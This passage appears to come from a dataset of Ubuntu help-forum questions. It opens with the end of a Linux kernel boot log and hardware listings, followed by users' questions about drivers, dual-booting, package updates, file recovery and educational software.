mousedev : ps/2 mouse device common for all mice [ 2.036710 ] rtc_cmos 00:07 : rtc can wake from s4 [ 2.036881 ] rtc_cmos 00:07 : rtc core : registered rtc_cmos as rtc0 [ 2.037143 ] rtc0 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs [ 2.037503 ] device-mapper : uevent : version 1.0.3 [ 2.037656 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 2.037725 ] eisa : probing bus 0 at eisa.0 [ 2.037729 ] eisa : can not allocate resource for mainboard [ 2.037734 ] can not allocate resource for eisa slot 1 [ 2.037738 ] can not allocate resource for eisa slot 2 [ 2.037741 ] can not allocate resource for eisa slot 3 [ 2.037745 ] can not allocate resource for eisa slot 4 [ 2.037749 ] can not allocate resource for eisa slot 5 [ 2.037753 ] can not allocate resource for eisa slot 6 [ 2.037756 ] can not allocate resource for eisa slot 7 [ 2.037760 ] can not allocate resource for eisa slot 8 [ 2.037764 ] eisa : detected 0 cards . [ 2.037782 ] cpufreq-nforce2 : no nforce2 chipset . [ 2.038264 ] cpuidle : using governor ladder [ 2.039015 ] cpuidle : using governor menu [ 2.039019 ] efi variables facility v0.08 2004-may-17 [ 2.040061 ] tcp cubic registered [ 2.041438 ] net : registered protocol family 10 [ 2.043814 ] net : registered protocol family 17 [ 2.043823 ] registering the dns_resolver key type [ 2.044290 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input4 [ 2.044336 ] using ipi no-shortcut mode [ 2.045620 ] pm : hibernation image not present or could not be loaded . [ 2.045644 ] registered taskstats version 1 [ 2.073070 ] magic number : 4:976:796 [ 2.073415 ] rtc_cmos 00:07 : setting system clock to 2012-07-11 18:45:23 utc ( 1342032323 ) [ 2.076654 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 2.076658 ] edd information not available . [ 2.302111 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 2.302587 ] ata1.00 : ata-9 : m4-ct128m4ssd2 , 000f , max udma/100 [ 2.302595 ] ata1.00 : 250069680 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 2.303143 ] ata1.00 : configured for udma/100 [ 2.303453 ] scsi 0:0:0:0 : direct-access ata m4-ct128m4ssd2 000f pq : 0 ansi : 5 [ 2.303746 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 2.303920 ] sd 0:0:0:0 : [ sda ] 250069680 512-byte logical blocks : ( 128 gb/119 gib ) [ 2.304213 ] sd 0:0:0:0 : [ sda ] write protect is off [ 2.304225 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 2.304471 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.306818 ] sda : sda1 sda2 < sda5 > [ 2.308780 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 2.318162 ] refined tsc clocksource calibration : 1595.999 mhz . [ 2.318169 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 2.318178 ] switching to clocksource tsc [ 2.450939 ] hub 1-1:1.0 : usb hub found [ 2.451121 ] hub 1-1:1.0 : 6 ports detected [ 2.561786 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 2.621757 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 2.636143 ] ata2.00 : atapi : tsstcorp dvd+/-rw ts-t633c , d800 , max udma/100 [ 2.636152 ] ata2.00 : applying bridge limits [ 2.649711 ] ata2.00 : configured for udma/100 [ 2.653762 ] scsi 1:0:0:0 : cd-rom tsstcorp dvd+-rw ts-t633c d800 pq : 0 ansi : 5 [ 2.661486 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.661494 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.661890 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.662156 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 2.694649 ] hub 2-1:1.0 : usb hub found [ 2.694840 ] hub 2-1:1.0 : 8 ports detected [ 2.765823 ] usb 1-1.4 : new high-speed usb device number 3 using ehci_hcd [ 2.981454 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 2.982597 ] freeing unused kernel memory : 740k freed [ 2.983523 ] write protecting the kernel text : 5816k [ 2.983808 ] write protecting the kernel read-only data : 2376k [ 2.983811 ] nx-protecting the kernel data : 4424k [ 3.014594 ] udevd [ 127 ] : starting version 175 [ 3.068925 ] sdhci : secure digital host controller interface driver [ 3.068932 ] sdhci : copyright ( c ) pierre ossman [ 3.069714 ] sdhci-pci 0000:09:00.0 : sdhci controller found [ 1180 : e822 ] ( rev 1 ) [ 3.069742 ] sdhci-pci 0000:09:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 3.069786 ] sdhci-pci 0000:09:00.0 : will use dma mode even though hw does n't fully claim to support it . [ 3.069798 ] sdhci-pci 0000:09:00.0 : setting latency timer to 64 [ 3.069816 ] mmc0 : no vmmc regulator found [ 3.069877 ] registered led device : mmc0 : : [ 3.070946 ] mmc0 : sdhci controller on pci [ 0000:09:00.0 ] using dma [ 3.071078 ] tg3.c : v3.121 ( november 2 , 2011 ) [ 3.071252 ] tg3 0000:0b:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 3.071269 ] tg3 0000:0b:00.0 : setting latency timer to 64 [ 3.071403 ] firewire_ohci 0000:09:00.3 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 3.071417 ] firewire_ohci 0000:09:00.3 : setting latency timer to 64 [ 3.078509 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem [ 3.078517 ] ext4-fs ( sda1 ) : write access will be enabled during recovery [ 3.110417 ] tg3 0000:0b:00.0 : eth0 : tigon3 [ partno ( bcm95784m ) rev 5784100 ] ( pci express ) mac address b8 : ac:6f:71:02 : a6 [ 3.110425 ] tg3 0000:0b:00.0 : eth0 : attached phy is 5784 ( 10/100/1000base-t ethernet ) ( wirespeed [ 1 ] , eee [ 0 ] ) [ 3.110431 ] tg3 0000:0b:00.0 : eth0 : rxcsums [ 1 ] linkchgreg [ 0 ] miirq [ 0 ] asf [ 0 ] tsocap [ 1 ] [ 3.110436 ] tg3 0000:0b:00.0 : eth0 : dma_rwctrl [ 76180000 ] dma_mask [ 64-bit ] [ 3.125492 ] firewire_ohci : added fw-ohci device 0000:09:00.3 , ohci v1.10 , 4 ir + 4 it contexts , quirks 0x11 [ 3.390124 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs [ 3.390135 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078710 [ 3.390232 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2363071 [ 3.390327 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078711 [ 3.390350 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078709 [ 3.390367 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078708 [ 3.390384 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078707 [ 3.390401 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078706 [ 3.390417 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078705 [ 3.390435 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078551 [ 3.390452 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078523 [ 3.390470 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7078520 [ 3.390487 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7077901 [ 3.390551 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4063272 [ 3.390562 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4063266 [ 3.390572 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4063261 [ 3.390582 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4063256 [ 3.390592 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 4063255 [ 3.390602 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2363072 [ 3.390620 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2360050 [ 3.390698 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 5250064 [ 3.390710 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2365394 [ 3.390728 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 2365390 [ 3.390745 ] ext4-fs ( sda1 ) : 22 orphan inodes deleted [ 3.390748 ] ext4-fs ( sda1 ) : recovery complete [ 3.397636 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 3.624910 ] firewire_core : created device fw0 : guid 464fc000110e2661 , s400 [ 3.927467 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 3.929965 ] udevd [ 400 ] : starting version 175 [ 3.933581 ] adding 6278140k swap on /dev/sda5 . priority : -1 extents:1 across:6278140k ss [ 3.945183 ] lp : driver loaded but no devices found [ 3.999389 ] wmi : mapper loaded [ 4.016696 ] ite_cir : auto-detected model : ite8708 cir transceiver [ 4.016702 ] ite_cir : using model : ite8708 cir transceiver [ 4.016706 ] ite_cir : tx-capable : 1 [ 4.016710 ] ite_cir : sample period ( ns ) : 8680 [ 4.016713 ] ite_cir : tx carrier frequency ( hz ) : 38000 [ 4.016716 ] ite_cir : tx duty cycle ( % ) : 33 [ 4.016719 ] ite_cir : rx low carrier frequency ( hz ) : 0 [ 4.016722 ] ite_cir : rx high carrier frequency ( hz ) : 0 [ 4.025684 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 4.025691 ] disabling lock debugging due to kernel taint [ 4.027410 ] ir nec protocol handler initialized [ 4.030250 ] lib80211 : common routines for ieee802.11 drivers [ 4.030257 ] lib80211_crypt : registered algorithm 'null' [ 4.036024 ] ir rc5 ( x ) protocol handler initialized [ 4.036092 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 4.036188 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 4.036307 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 4.036361 ] [ firmware bug ] : acpi : no _bqc method , can not determine initial brightness [ 4.039006 ] acpi device:03 : registered as cooling_device10 [ 4.039164 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/device:01/lnxvideo:00/input/input5 [ 4.039261 ] acpi : video device [ m86 ] ( multi-head : yes rom : no post : no ) [ 4.049753 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 4.050201 ] wl 0000:05:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 4.050215 ] wl 0000:05:00.0 : setting latency timer to 64 [ 4.052252 ] registered ir keymap rc-rc6-mce [ 4.052432 ] input : ite8708 cir transceiver as /devices/virtual/rc/rc0/input6 [ 4.054614 ] ir rc6 protocol handler initialized [ 4.054787 ] rc0 : ite8708 cir transceiver as /devices/virtual/rc/rc0 [ 4.054839 ] ite_cir : driver has been successfully loaded [ 4.057338 ] ir jvc protocol handler initialized [ 4.061553 ] ir sony protocol handler initialized [ 4.066578 ] input : mce ir keyboard/mouse ( ite-cir ) as /devices/virtual/input/input7 [ 4.066724 ] ir mce keyboard/mouse protocol handler initialized [ 4.072580 ] lirc_dev : ir remote control driver registered , major 250 [ 4.073280 ] rc rc0 : lirc_dev : driver ir-lirc-codec ( ite-cir ) registered at minor = 0 [ 4.073286 ] ir lirc bridge handler initialized [ 4.077849 ] linux video capture interface : v2.00 [ 4.079402 ] uvcvideo : found uvc 1.00 device laptop_integrated_webcam_2m ( 0c45:640f ) [ 4.085492 ] edac mc : ver : 2.1.0 [ 4.087138 ] lib80211_crypt : registered algorithm 'tkip' [ 4.091027 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 4.091733 ] snd_hda_intel 0000:02:00.1 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 4.091826 ] snd_hda_intel 0000:02:00.1 : irq 47 for msi/msi-x [ 4.091861 ] snd_hda_intel 0000:02:00.1 : setting latency timer to 64 [ 4.093115 ] edac i7core : device not found : dev 00.0 pci id 8086:2c50 [ 4.112448 ] hdmi status : codec=0 pin=3 presence_detect=0 eld_valid=0 [ 4.112612 ] input : hd-audio generic hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/0000:02:00.1/sound/card1/input9 [ 4.113311 ] type=1400 audit ( 1342032325.540:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=658 comm= '' apparmor_parser '' [ 4.114501 ] type=1400 audit ( 1342032325.540:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=658 comm= '' apparmor_parser '' [ 4.115253 ] type=1400 audit ( 1342032325.540:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=658 comm= '' apparmor_parser '' [ 4.121870 ] input : laptop_integrated_webcam_2m as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/input/input10 [ 4.122096 ] usbcore : registered new interface driver uvcvideo [ 4.122100 ] usb video class driver ( 1.1.1 ) [ 4.128729 ] [ fglrx ] maximum main memory to use for locked dma buffers : 5840 mbytes . [ 4.129678 ] [ fglrx ] vendor : 1002 device : 68c0 count : 1 [ 4.131991 ] [ fglrx ] ioport : bar 4 , base 0x2000 , size : 0x100 [ 4.132015 ] pci 0000:02:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 4.132024 ] pci 0000:02:00.0 : setting latency timer to 64 [ 4.133712 ] [ fglrx ] kernel pat support is enabled [ 4.133747 ] [ fglrx ] module loaded - fglrx 8.96.4 [ mar 12 2012 ] with 1 minors [ 4.162666 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 5.100.82.38 [ 4.184133 ] device-mapper : multipath : version 1.3.0 loaded [ 4.196660 ] dcdbas dcdbas : dell systems management base driver ( version 5.6.0-3.2 ) [ 4.279897 ] input : dell wmi hotkeys as /devices/virtual/input/input11 [ 4.292402 ] bluetooth : core ver 2.16 [ 4.292449 ] net : registered protocol family 31 [ 4.292454 ] bluetooth : hci device and connection manager initialized [ 4.292459 ] bluetooth : hci socket layer initialized [ 4.292463 ] bluetooth : l2cap socket layer initialized [ 4.292473 ] bluetooth : sco socket layer initialized [ 4.296333 ] bluetooth : rfcomm tty layer initialized [ 4.296342 ] bluetooth : rfcomm socket layer initialized [ 4.296345 ] bluetooth : rfcomm ver 1.11 [ 4.313586 ] ppdev : user-space parallel port driver [ 4.316619 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 4.316625 ] bluetooth : bnep filters : protocol multicast [ 4.383980 ] type=1400 audit ( 1342032325.812:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=938 comm= '' apparmor_parser '' [ 4.385173 ] type=1400 audit ( 1342032325.812:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=938 comm= '' apparmor_parser '' [ 4.425757 ] init : failsafe main process ( 898 ) killed by term signal [ 4.477052 ] type=1400 audit ( 1342032325.904:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1011 comm= '' apparmor_parser '' [ 4.477592 ] type=1400 audit ( 1342032325.904:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1010 comm= '' apparmor_parser '' [ 4.478099 ] type=1400 audit ( 1342032325.904:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=1017 comm= '' apparmor_parser '' [ 4.479233 ] type=1400 audit ( 1342032325.904:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1014 comm= '' apparmor_parser '' [ 4.510060 ] vesafb : mode is 1152x864x32 , linelength=4608 , pages=0 [ 4.510065 ] vesafb : scrolling : redraw [ 4.510071 ] vesafb : truecolor : size=0:8:8:8 , shift=0:16:8:0 [ 4.510084 ] mtrr : no more mtrrs available [ 4.513081 ] vesafb : framebuffer at 0xd0000000 , mapped to 0xf9400000 , using 3904k , total 3904k [ 4.515203 ] console : switching to colour frame buffer device 144x54 [ 4.515278 ] fb0 : vesa vga frame buffer device [ 4.590743 ] tg3 0000:0b:00.0 : irq 48 for msi/msi-x [ 4.702009 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 4.704409 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 4.978379 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd04733/0xa40000/0xa0000 [ 5.030104 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input12 [ 5.045782 ] kvm : vm_exit_load_ia32_perf_global_ctrl does not work properly . using workaround [ 5.519573 ] [ fglrx ] atif platform detected with notification id : 0x81 [ 6.391466 ] fglrx_pci 0000:02:00.0 : irq 49 for msi/msi-x [ 6.393137 ] [ fglrx ] firegl kernel thread pid : 1305 [ 6.393306 ] [ fglrx ] firegl kernel thread pid : 1306 [ 6.393472 ] [ fglrx ] firegl kernel thread pid : 1307 [ 6.393726 ] [ fglrx ] irq 49 enabled [ 6.528052 ] postgres ( 1308 ) : /proc/1308/oom_adj is deprecated , please use /proc/1308/oom_score_adj instead . [ 6.532080 ] [ fglrx ] gart uswc size:1280 m. [ 6.532084 ] [ fglrx ] gart cacheable size:508 m. [ 6.532091 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 6.532094 ] [ fglrx ] reserved fb block : unshared offset : f8fd000 , size:403000 [ 6.532098 ] [ fglrx ] reserved fb block : unshared offset:3fff4000 , size : c000 [ 17.423743 ] eth1 : no ipv6 routers present [ 75.836426 ] warning : `proftpd ' uses 32-bit capabilities ( legacy support in use ) [ 75.884215 ] init : plymouth-stop pre-start process ( 2922 ) terminated with status 1 [ 543.679614 ] eth1 : no ipv6 routers present lsmod module size used by kvm_intel 127560 0 kvm 359456 1 kvm_intel joydev 17393 0 vesafb 13516 1 parport_pc 32114 0 bnep 17830 2 ppdev 12849 0 rfcomm 38139 0 bluetooth 158438 10 bnep , rfcomm dell_wmi 12601 0 sparse_keymap 13658 1 dell_wmi binfmt_misc 17292 1 dell_laptop 17767 0 dcdbas 14098 1 dell_laptop dm_multipath 22710 0 fglrx 2909855 143 snd_hda_codec_hdmi 31775 1 psmouse 72919 0 serio_raw 13027 0 i7core_edac 23382 0 lib80211_crypt_tkip 17275 0 edac_core 46858 1 i7core_edac uvcvideo 67203 0 snd_hda_codec_idt 60251 1 videodev 86588 1 uvcvideo ir_lirc_codec 12739 0 lirc_dev 18700 1 ir_lirc_codec ir_mce_kbd_decoder 12681 0 snd_seq_midi 13132 0 ir_sony_decoder 12462 0 ir_jvc_decoder 12459 0 snd_rawmidi 25424 1 snd_seq_midi ir_rc6_decoder 12459 0 wl 2646601 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event ir_rc5_decoder 12459 0 video 19068 0 snd_hda_intel 32765 5 snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel rc_rc6_mce 12454 0 lib80211 14040 2 lib80211_crypt_tkip , wl snd_hwdep 13276 1 snd_hda_codec ir_nec_decoder 12459 0 snd_pcm 80845 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ite_cir 24743 0 rc_core 21263 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , rc_rc6_mce , ir_nec_decoder , ite_cir snd_timer 28931 2 snd_seq , snd_pcm wmi 18744 1 dell_wmi snd 62064 20 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_rawmidi , snd_seq , snd_seq_device , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_timer mac_hid 13077 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm coretemp 13269 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp tg3 141369 0 firewire_ohci 40172 0 sdhci_pci 18324 0 firewire_core 56906 1 firewire_ohci sdhci 28241 1 sdhci_pci crc_itu_t 12627 1 firewire_core lshw *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth1 version : 01 serial : 70 : f1 : a1 : a9:54:31 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.0.117 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : f0900000-f0903fff *-network description : ethernet interface product : netlink bcm5784m gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth0 version : 10 serial : b8 : ac:6f:71:02 : a6 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 firmware=sb v2.19 latency=0 link=no multicast=yes port=twisted pair resources : irq:48 memory : f0d00000-f0d0ffff
162525	learning programs for kids	i am installing ubuntu in 2 schools that hold at least 1000 kids and wanted to know what programs are available in ubuntu to teach this kids . this kids range from ages 4 to 13 . programs that help in math , science , drawing and chemistry would be very good .
162526	updates not updating due to installation of untrusted packages in 12.04 ?	i ve had an issue with the update center about a month and a half ago and somehow resolved it.today i checked my updates , clicked install and recieved an error message of `` reguires installation of untrusted packages '' .the only thing i can think of that i ve done was installing playonlinux and wine.anyone having or had this issue ?
162528	why ca n't i download certain software ?	i just installed ubuntu . totally new to it . i tried to download to different things from the internet ( realplayer and youtube downloader ) , but when i try to open the file ( s ) to install an archive box pops up saying that i ca n't . what 's the problem here ? any help is greatly appreciated . thanks . the message i get is : archive : /home/justanotherpoet/downloads/realplayer.exe zip file size : 760128 bytes , number of entries : 35584 [ /home/justanotherpoet/downloads/realplayer.exe ] : zipfile is disk 46863 of a multi-disk archive , and this is not the disk on which the central zipfile directory begins ( disk 42501 ) .
162529	install ubuntu ( 11.10 or above ) on dell xps 17 - dual booting	some time ago i briefly looked into installing ubuntu 11.10 ( or above ) on my dell xps17 . i remember there were quite a few issues ( sorry ca n't remember which ones , it was long time ago ) and i was wondering if anybody could let me know if i can install it without having any problems at all ( i would like to keep windows 7 there anyway ) . my processor is intel ( r ) core ( tm ) i7-2720qm 2.2ghz .
162535	why does switching to the tty give me a blank screen ?	after booting to the gui in 12.04 , i attempt to move to the virtual terminal ( or shell , or tty ) via ctrl-alt-f1 ( f1 - 6 ) , and the screen remains blank . i 'm tried all 6 tty instances and the results are the same . ctrl-alt-f7 brings me back to the gui without a problem . any thoughts ?
162538	how to always open the dash on the applications view ?	i hate that i always have to click on the applications view button after i open the dash . is there a way to make it open to the applications view by default ? thanks !
162546	how can i configure which filetypes can be opened by dragging to an application 's launcher ?	when we drag some file from some web page or nautilus towards the launcher , the application that in which it can be coppied remains highlighted and others fade out . so where is this configuration file that decides which file can be dragged to which application in the launcher ? for example , right now , only a file of some document type can be dragged to gwoffice and some binary file or deb file cant be drag and dropped . so how do i allow suppose a deb file to be draged and droped to gwoffice . that was just an example ... i want to know how its done in general too .
162550	opengl drivers broken , glxgears wo n't run	when i try to run glxgears or ssh to a machine and use opengl with the -x flag , i get this error message : xlib : extension `` glx '' missing on display `` :0 '' . error : could n't get an rgb , double-buffered visual the output of lspci is : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520m ] ( rev a1 ) 07:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) 08:00.0 network controller : intel corporation centrino advanced-n 6230 ( rev 34 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 09:00.1 sd host controller : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 0f:00.0 usb controller : texas instruments device 8241 ( rev 02 ) this is a fresh install of ubuntu , and strangely the proprietary nvidia driver is not listed under additional drivers . the nvidia x server settings tells me you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . if i do this , i am greeted with a 640x480 screen in addition to the above problems ( i fixed this particular problem with mv /etc/x11/xorg.config.backup /etc/x11/xorg.config ) the output of ldd $ ( which glxgears ) is linux-vdso.so.1 = > ( 0x00007fffc0bff000 ) libgl.so.1 = > /usr/lib/nvidia-current/libgl.so.1 ( 0x00007f6e0f10d000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f6e0ee13000 ) libx11.so.6 = > /usr/lib/x86_64-linux-gnu/libx11.so.6 ( 0x00007f6e0eade000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f6e0e721000 ) libnvidia-tls.so.302.17 = > /usr/lib/nvidia-current/tls/libnvidia-tls.so.302.17 ( 0x00007f6e0e51e000 ) libnvidia-glcore.so.302.17 = > /usr/lib/nvidia-current/libnvidia-glcore.so.302.17 ( 0x00007f6e0c16c000 ) libxext.so.6 = > /usr/lib/x86_64-linux-gnu/libxext.so.6 ( 0x00007f6e0bf5b000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f6e0bd57000 ) libxcb.so.1 = > /usr/lib/x86_64-linux-gnu/libxcb.so.1 ( 0x00007f6e0bb38000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f6e0f448000 ) libxau.so.6 = > /usr/lib/x86_64-linux-gnu/libxau.so.6 ( 0x00007f6e0b935000 ) libxdmcp.so.6 = > /usr/lib/x86_64-linux-gnu/libxdmcp.so.6 ( 0x00007f6e0b72f000 )
162551	recovering home folder after failure to boot	i have a small issue . i was having some issues in getting some libraries to work and to resolve it , i deleted some shared libraries by mistake ( sudo ... ) .now ubuntu fails to boot up but i can access the files from recovery mode . i can see my home folder intact but i can not even run sudo nautilus as it says it shared libraries not found . the data in my home folder is quite important and i want retrieving it is important . i am running a windows dual boot , if it helps . if anyone could help copy the home folder to a windows drive from the terminal itself ( as i can access it at recovery mode ) it would be of immense help . thanks . : - )
162553	install ubuntu on crashed pc	can i download ubuntu on macmini to make usb device to install ubuntu on pc laptop with bad windows and recover files on the laptop ?
162556	dualboot asus n56v ( ubuntu / win 7 x64 ) - ubuntu does n't detect partition table made by windows	i have an asus n56v and i 've got troubles installing ubuntu 12.04 x64 . i already have installed windows 7 x64 ! the hard drive is : hitachi hts547575a9e384 my problem : the installation program does n't recognize the already existing partitions and is offering only options where there are partitions . can someone help me out ? is this an acpi/ide conflict , missing driver or conflict with windows 7 ? ( i 'm not an expert on linux , only working sometimes with it . ) i now tried out some options concerning efi with a gtp-table . everything worked but i was n't able to fix a dual boot ( windows boot loader ) nor with grub2 . the laptop is still having a bios , but is able to boot dvds/cds in efi-mode . now i try to avoid efi and gtp using the old windows mbr style . i reinstalled windows , so far no problem . when i want to try to install ubuntu , it does n't detect the already existing partition table . it is just showing me an empty space for the whole disk . other threads like ubuntu 12.04 does not see windows already install on my computer ( dual installation ) do n't help me out . os-prober shows me a correct result . i do n't know how to deal with gdisk as shown in installer does n't detect existing partition table/windows 7 partition . i have 750gb for the whole disk . i 'm using : 90gb for windows reserved partition + system partition , 500gb for data and the rest should be for swap and linux-system . how can i make ubuntu detect the partition table ?
162558	is there an online documentation repository for ruby like it is for matlab ?	is there an online documentation repository for ruby like it is for matlab ? a site that documents the functions and objects , their uses , parameters , etc ? matlab online documentation
